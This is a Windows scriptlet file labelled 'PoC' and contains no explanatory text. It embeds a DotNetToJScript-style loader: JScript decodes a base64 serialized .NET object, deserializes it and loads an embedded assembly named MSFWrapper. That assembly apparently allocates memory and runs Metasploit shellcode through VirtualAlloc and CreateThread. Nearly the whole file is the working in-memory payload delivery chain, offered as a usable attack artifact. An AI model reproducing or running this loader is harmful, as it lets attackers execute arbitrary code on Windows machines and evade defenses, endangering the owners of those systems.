<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
           function setversion() {
}
function debug(s) {}
function base64ToStream(b) {
	var enc = new ActiveXObject("System.Text.ASCIIEncoding");
	var length = enc.GetByteCount_2(b);
	var ba = enc.GetBytes_4(b);
	var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
	ba = transform.TransformFinalBlock(ba, 0, length);
	var ms = new ActiveXObject("System.IO.MemoryStream");
	ms.Write(ba, 0, (length / 4) * 3);
	ms.Position = 0;
	return ms;
}

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABgAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAOECIWQAAAAAA"+
"AAAA4AACAQsBMAAADgAAAAgAAAAAAACSKgAAACAAAABAAAAAAEAAACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAgBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAQCoA"+
"AE8AAAAAQAAA4AUAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAgpAAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAAB4DQAAACAAAAAOAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA4AUAAABA"+
"AAAABgAAABAAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAWAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAHQqAAAAAAAASAAAAAIABQDYIAAAMAgAAAMAAAADAAAG"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMgIoDwAACigC"+
"AAAGKgAAABMwBgBnAAAAAQAAESDaAgAAjRIAAAEl0AEAAAQoEAAACgoWKBEAAAoGjmkgABAAACgS"+
"AAAKIAAwAAAfQCgEAAAGCwYWBwaOaSgTAAAKFigRAAAKFgcWKBEAAAoWFigRAAAKKAUAAAYmINAH"+
"AAAoFAAACioGKgAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAANgCAAAjfgAA"+
"RAMAAMADAAAjU3RyaW5ncwAAAAAEBwAABAAAACNVUwAIBwAAEAAAACNHVUlEAAAAGAcAABgBAAAj"+
"QmxvYgAAAAAAAAACAAABV5UCNAkCAAAA+gEzABYAAAEAAAAZAAAABAAAAAEAAAAFAAAACgAAABQA"+
"AAAOAAAAAQAAAAEAAAABAAAAAgAAAAEAAAABAAAAAQAAAAEAAAAAAD8CAQAAAAAABgCvAQ4DBgAc"+
"Ag4DBgD8ANwCDwAuAwAABgAkAaACBgCSAaACBgBzAaACBgADAqACBgDPAaACBgDoAaACBgA7AaAC"+
"BgAQAe8CBgDuAO8CBgBWAaACBgCIA5QCBgDTAA4DBgC4AJQCBgA6ApQCBgBgAw4DBgCzA5QCBgCl"+
"AJQCBgDVApQCBgByApQCBgB3Au8CBgCeAGECAAAAAEgAAAAAAAEAAQABABAAjAK4Aj0AAQABAAAB"+
"AABRAAAAPQABAAYAEwEAAAEAAABFAAIABgAzAR8ASgBQIAAAAACGGM8CBgABAGAgAAAAAJYAcABO"+
"AAEA0yAAAAAAlgCbAk4AAQAAAAAAgACWIIAAUgABAAAAAACAAJYgmABaAAUAAAABAG8DAAACAFoC"+
"AAADAMIAAAAEAI8DAAABAD0DAAACAE4CAAADAHkDAAAEAMMCAAAFAFADAAAGAI0ACQDPAgEAEQDP"+
"AgYAGQDPAgoAKQDPAhAAMQDPAhAAOQDPAhAAQQDPAhAASQDPAhAAUQDPAhAAWQDPAhAAYQDPAhUA"+
"aQDPAhAAcQDPAhAAgQDPAgYAeQDPAgYAmQCpAyAAsQCZAygAuQClAy0AwQC5AzMAyQCyAjwALgAL"+
"AGQALgATAG0ALgAbAIwALgAjAJUALgArAKUALgAzAKUALgA7AKsALgBDAJUALgBLALoALgBTAKUA"+
"LgBbAKUALgBjANsALgBrAAUBYwBzABIBAQDaAgAABAAaAH8CAAEJAIAAAQAAAQsAmAABAJgqAAAB"+
"AASAAAABAAAAAAAAAAAAAAAAALgCAAACAAAAAAAAAAAAAABBAHcAAAAAAAQAAwAAAAAAAF9fU3Rh"+
"dGljQXJyYXlJbml0VHlwZVNpemU9NzMwAEFBQUQwMERFRTJDNkVFMDkwMkE5NjI5Qjk4ODhBQzA0"+
"OUU5RjI3MjkAPE1vZHVsZT4APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRldGFpbHM+AFJ1bk1TRgBt"+
"c2NvcmxpYgBWaXJ0dWFsQWxsb2MAbHBUaHJlYWRJZABDcmVhdGVUaHJlYWQAUnVudGltZUZpZWxk"+
"SGFuZGxlAFZhbHVlVHlwZQBmbEFsbG9jYXRpb25UeXBlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmli"+
"dXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRl"+
"AEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1i"+
"bHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNz"+
"ZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRl"+
"AEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3Nl"+
"bWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBN"+
"U0ZXcmFwcGVyLmV4ZQBkd1N0YWNrU2l6ZQBkd1NpemUAU3lzdGVtLlRocmVhZGluZwBNYXRoAE1h"+
"cnNoYWwAa2VybmVsMzIuZGxsAFByb2dyYW0AU3lzdGVtAE1haW4AU3lzdGVtLlJlZmxlY3Rpb24A"+
"U2xlZXAATVNGV3JhcHBlcgBscFBhcmFtZXRlcgAuY3RvcgBJbnRQdHIAU3lzdGVtLkRpYWdub3N0"+
"aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxl"+
"clNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGxwVGhyZWFkQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxh"+
"Z3MAUnVudGltZUhlbHBlcnMAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAE9iamVjdABmbFByb3Rl"+
"Y3QAb3BfRXhwbGljaXQATWF4AEluaXRpYWxpemVBcnJheQBDb3B5AAAAAAAAAMAh7O5gxKdFop5W"+
"cHOYR+0ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUHAh0FGAcAAgESURFVBAABGAgFAAIICAgI"+
"AAQBHQUIGAgEAAEBCAi3elxWGTTgiQMGERADAAABBwAEGBgJCQkJAAYYGAkYGAkYCAEACAAAAAAA"+
"HgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAAA8BAApNU0ZXcmFwcGVyAAAF"+
"AQAAAAAOAQAJTWljcm9zb2Z0AAAgAQAbQ29weXJpZ2h0IMKpIE1pY3Jvc29mdCAyMDE3AAApAQAk"+
"MmIyZjQ1YjQtMGExMS00ZWQxLTgwMzYtMzg2ZWNhMmVhNmI0AAAMAQAHMS4wLjAuMAAABAEAAAAA"+
"AAAAADhAiFkAAAAAAgAAABwBAAAkKQAAJAsAAFJTRFN/8lROk0MIQokFEOItIcn8AQAAAEY6XFB1"+
"YmxpY1Byb2plY3RzXEMjXE1TRldyYXBwZXJcTVNGV3JhcHBlclxvYmpceDg2XFJlbGVhc2VcTVNG"+
"V3JhcHBlci5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaCoAAAAAAAAAAAAAgioAAAAgAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAHQqAAAAAAAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBA"+
"ANre2XQk9L4i7+wFWinJsbAxchoDchqD6vzi1xMFiBfs1s6UKd1xXsEcjqGvtVU94l0n92kvuNLj"+
"C2O8EPM1sZ+UnplujnJK+TR1bPFnJj9X26DGm+S2x/Ged0OmyjcrkRvreC/HWIF4n/D6FWDy0U73"+
"LttuB8TnPvgtf3re75h7Clw11z4vnSsR444spWv2f1ASCaoPGp0RING9ZRXypmVp/Kvv9WskY45F"+
"3/sLmveSLGX4g2xl+atvcodUkIPn3XWyJ7n+5ZfJUwpcn0eZEAhnKp5uRquyU8kvyIcpEQPaKFZ5"+
"F3gP9optJEIXBXZDH/rPYg6tRD2QT4g2mVfNclPjJQliJXTyyQi4ARNMf/lmpIOEcHP5UvRgWRGu"+
"TFv2KQZXsz5AdEKS+oDPFS0BizHpSUhbqDc/ZKqX4MCgOvV461Jn5mCjH5/hzbYLml0/kl2hauu6"+
"DsdfbuKPZcZ96GUzLqXzv4IabHslnGyTap1sY1ztCS3bPaT3eQkwuk8I81z7psPujlN1ujWtFnXk"+
"4rQdaWgB7Fo9zXrWjpQ5mpgSjwJhPLzT57c3YUNdz/klpHzM3pq2XWVq5etWWT9R19BObYBl7ux5"+
"yHeoqIUPd+pMuTE4ImDQWNbgfdpnRw1NHg+LNYn8AdB4NaBA0G4BK4fi+qNDeZQs6htQ15G1wyEV"+
"fJYV6vYrzj6Z6yF5FWs50IBB6qpkwlYuH1URx4YiuE9A1CPk03vXNVL2ZHAe9toUyX9FIgqq8G2m"+
"PQJAqTpR93oUBqEUcf1j3noo7UqPjXoLvDF7giNbf8TJhCmMePxLynzVJ4DRhpFO+y4G9Pz7s8p2"+
"F9RCaxckO8jnEVsv0hXuHTTgEJ7EmVD2xE1RBqxtUUYsPTkeiJJcYQWHzM0sT6WZLrBKWn3mIkgX"+
"j1GTwhVVGCOeUeB4JJ2Xm3/dB4vrHki039GZeBIiyEhgbCCHhMu4UiZ9U5x0fXYAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAAFAAAIAAAAAAAAAA"+
"AAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEA"+
"AQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAOADAACQQAAAUAMAAAAAAAAAAAAAUAM0AAAAVgBT"+
"AF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8A"+
"AAAAAAAABAAAAAEAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAA"+
"ACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBLACAAABAFMAdAByAGkAbgBnAEYA"+
"aQBsAGUASQBuAGYAbwAAAIwCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBu"+
"AHQAcwAAAAAAAAA0AAoAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAE0AaQBjAHIAbwBzAG8A"+
"ZgB0AAAAPgALAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAE0AUwBGAFcAcgBh"+
"AHAAcABlAHIAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4A"+
"MAAAAD4ADwABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAATQBTAEYAVwByAGEAcABwAGUAcgAu"+
"AGUAeABlAAAAAABaABsAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIA"+
"aQBnAGgAdAAgAKkAIABNAGkAYwByAG8AcwBvAGYAdAAgADIAMAAxADcAAAAAACoAAQABAEwAZQBn"+
"AGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAARgAPAAEATwByAGkAZwBpAG4AYQBsAEYA"+
"aQBsAGUAbgBhAG0AZQAAAE0AUwBGAFcAcgBhAHAAcABlAHIALgBlAHgAZQAAAAAANgALAAEAUABy"+
"AG8AZAB1AGMAdABOAGEAbQBlAAAAAABNAFMARgBXAHIAYQBwAHAAZQByAAAAAAA0AAgAAQBQAHIA"+
"bwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBt"+
"AGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAADwQwAA6gEAAAAAAAAAAAAA"+
"77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/"+
"Pg0KDQo8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBt"+
"YW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDxhc3NlbWJseUlkZW50aXR5IHZlcnNpb249IjEuMC4w"+
"LjAiIG5hbWU9Ik15QXBwbGljYXRpb24uYXBwIi8+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpz"+
"Y2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYyIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVx"+
"dWVzdGVkUHJpdmlsZWdlcyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjMi"+
"Pg0KICAgICAgICA8cmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWwgbGV2ZWw9ImFzSW52b2tlciIgdWlB"+
"Y2Nlc3M9ImZhbHNlIi8+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1"+
"cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5PgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAACAAAAwAAACUOgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVj"+
"dGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'MSFWrapper.Program';

try {
	setversion();
	var stm = base64ToStream(serialized_obj);
	var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
	var al = new ActiveXObject('System.Collections.ArrayList');
	var n = fmt.SurrogateSelector;
	var d = fmt.Deserialize_2(stm);
	al.Add(n);
	var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
	
} catch (e) {
    debug(e.message);
}
		]]>
</script>
</registration>
</scriptlet>